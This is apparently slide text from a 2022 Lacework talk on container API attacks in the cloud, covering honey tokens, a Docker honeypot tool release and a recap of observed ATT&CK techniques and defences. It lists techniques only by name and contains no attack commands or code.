  • 24. © 2022, Lacework Inc. All Rights Reserved. Beyond ACLs & Limiting exposed container APIs Honey Tokens in Cloud Native Environments ● What about non-opportunistic attackers? ○ Targeting resource specific services ○ Ex: Managed DBs, Container Registries, etc… ● Proactive Defenses via “honey tokens” around specific cloud native resources ○ Ex: Container Registry with beta-database-secrets- test Reference: https://www.lacework.com/blog/diy-canary-tokens-in-aws 24
  • 25. Docker Honeypot - Whalehoney https://www.github.com/lacework-dev/whalehoney-PUBLIC Tool Release! Whalehoney, simple API emulation
  • 26. © 2022, Lacework Inc. All Rights Reserved. 26 Recap Observed ATT&CKs T1610/T1611 - Deploy containers and escape to host. T1059.004 - Post-compromise payloads (Shell Script) T1562.001 - Impairing Defenses T1098.004 - Deploying ssh keys for persistence T1574.006/T10014 - LD_Preload/KOs for hijacking execution flow Defending In the Cloud Limit attack surface exposure (ingress/egress ACLs) Enforce signed container image deployments Implement Security Policies to API call Possibilities OPA for security policy enforcement of Kubernetes Proactive Defense via Honey Tokens
  • 27. Thank you. IF YOU HAVE QUESTIONS, PLEASE GET IN TOUCH WITH laceworklabs@lacework.com © 2022, Lacework Inc. All Rights Reserved.